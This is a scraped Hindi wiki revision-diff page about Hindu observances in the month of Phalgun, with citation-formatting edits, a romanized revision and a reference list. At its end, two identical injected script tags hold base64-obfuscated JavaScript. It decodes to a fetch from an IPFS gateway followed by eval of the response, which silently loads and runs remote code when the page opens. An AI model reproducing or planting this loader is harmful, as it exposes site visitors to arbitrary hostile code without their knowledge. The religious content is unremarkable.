Difference between revisions of "फाल्गुन कृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
*यह द्रष्टव्य है कि सामान्यतः सभी बृहत वार्षिक उत्सव दक्षिण [[भारत]] में छोटे या बड़े मन्दिर में [[फाल्गुन मास]] में मनाये जाते हैं।<ref>हेमाद्रि (व्रतखण्ड 2, 797-799)</ref>; <ref>कृत्यरत्नाकर (515-531)</ref>; <ref>वर्षक्रियाकौमुदी (503-517)</ref>; <ref>निर्णय सिन्धु (222-229)</ref>; <ref>स्मृतिकौस्तुभ (513-5179)</ref>   
+
*यह द्रष्टव्य है कि सामान्यतः सभी बृहत वार्षिक उत्सव दक्षिण [[भारत]] में छोटे या बड़े मन्दिर में [[फाल्गुन मास]] में मनाये जाते हैं।<ref>हेमाद्रि (व्रतखण्ड 2, 797-799</ref>; <ref>कृत्यरत्नाकर (515-531</ref>; <ref>वर्षक्रियाकौमुदी (503-517</ref>; <ref>निर्णय सिन्धु (222-229</ref>; <ref>स्मृतिकौस्तुभ (513-5179</ref>   
*फाल्गुन [[शुक्ल पक्ष|शुक्ल]] [[अष्टमी]] को [[लक्ष्मी]] एवं [[सीता]] की पूजा गन्ध आदि से की जाती है।<ref>कृत्यकल्पतरु, व्रत0 441-443</ref>; <ref>कृत्यरत्नाकर 527, ब्रह्मपुराण से उद्धरण)</ref>
+
*फाल्गुन [[शुक्ल पक्ष|शुक्ल]] [[अष्टमी]] को [[लक्ष्मी]] एवं [[सीता]] की पूजा गन्ध आदि से की जाती है।<ref>कृत्यकल्पतरु, व्रत0 441-443</ref>; <ref>कृत्यरत्नाकर 527, ब्रह्मपुराण से उद्धरण</ref>
*फाल्गुन [[पूर्णिमा]] पर यदि [[पूर्वा फाल्गुनी नक्षत्र|फाल्गुनी नक्षत्र]] हो तो एक पलंग, बिछावन के साथ में दिया जाता है, इससे सुन्दर स्त्री एवं सौभाग्य की प्राप्ति होती है।<ref>[[विष्णु धर्मसूत्र]] 90)</ref>
+
*फाल्गुन [[पूर्णिमा]] पर यदि [[पूर्वा फाल्गुनी नक्षत्र|फाल्गुनी नक्षत्र]] हो तो एक पलंग, बिछावन के साथ में दिया जाता है, इससे सुन्दर स्त्री एवं सौभाग्य की प्राप्ति होती है।<ref>[[विष्णु धर्मसूत्र]] 90</ref>
*[[अर्यमा]] एवं [[अदिति]] से [[कश्यप]], [[अत्रि]] एवं [[अनुसूया]] से [[चंद्र देवता|चन्द्र]] फाल्गुन पूर्णिमा को उत्पन्न हुए थे, अतः [[सूर्य देव|सूर्य]] एवं चन्द्र की पूजा चन्द्रोदय के समय होती है और गान, नृत्य एवं संगीत का दौर चलता है।<ref>कृत्यरत्नाकर (530)</ref>; <ref>कृत्यकल्पतरु (नैयतकालिक काण्ड, 443)</ref>
+
*[[अर्यमा]] एवं [[अदिति]] से [[कश्यप]], [[अत्रि]] एवं [[अनुसूया]] से [[चंद्र देवता|चन्द्र]] फाल्गुन पूर्णिमा को उत्पन्न हुए थे, अतः [[सूर्य देव|सूर्य]] एवं चन्द्र की पूजा चन्द्रोदय के समय होती है और गान, नृत्य एवं संगीत का दौर चलता है।<ref>कृत्यरत्नाकर (530</ref>; <ref>कृत्यकल्पतरु (नैयतकालिक काण्ड, 443</ref>
 
*इस पूर्णिमा पर 'उत्तिर' नामक एक मन्दिर उत्सव मनाया जाता है।
 
*इस पूर्णिमा पर 'उत्तिर' नामक एक मन्दिर उत्सव मनाया जाता है।
 
{{प्रचार}}
 
{{प्रचार}}

Latest revision as of 12:48, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah drashtavy hai ki samanyatah sabhi brihat varshik utsav dakshin bharat mean chhote ya b de mandir mean phalgun mas mean manaye jate haian.[1]; [2]; [3]; [4]; [5]
  • phalgun shukl ashtami ko lakshmi evan sita ki pooja gandh adi se ki jati hai.[6]; [7]
  • phalgun poornima par yadi phalguni nakshatr ho to ek palang, bichhavan ke sath mean diya jata hai, isase sundar stri evan saubhagy ki prapti hoti hai.[8]
  • aryama evan aditi se kashyap, atri evan anusooya se chandr phalgun poornima ko utpann hue the, atah soory evan chandr ki pooja chandroday ke samay hoti hai aur gan, nrity evan sangit ka daur chalata hai.[9]; [10]
  • is poornima par 'uttir' namak ek mandir utsav manaya jata hai.


tika tippani aur sandarbh

  1. hemadri (vratakhand 2, 797-799
  2. krityaratnakar (515-531
  3. varshakriyakaumudi (503-517
  4. nirnay sindhu (222-229
  5. smritikaustubh (513-5179
  6. krityakalpataru, vrat0 441-443
  7. krityaratnakar 527, brahmapuran se uddharan
  8. vishnu dharmasootr 90
  9. krityaratnakar (530
  10. krityakalpataru (naiyatakalik kand, 443

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>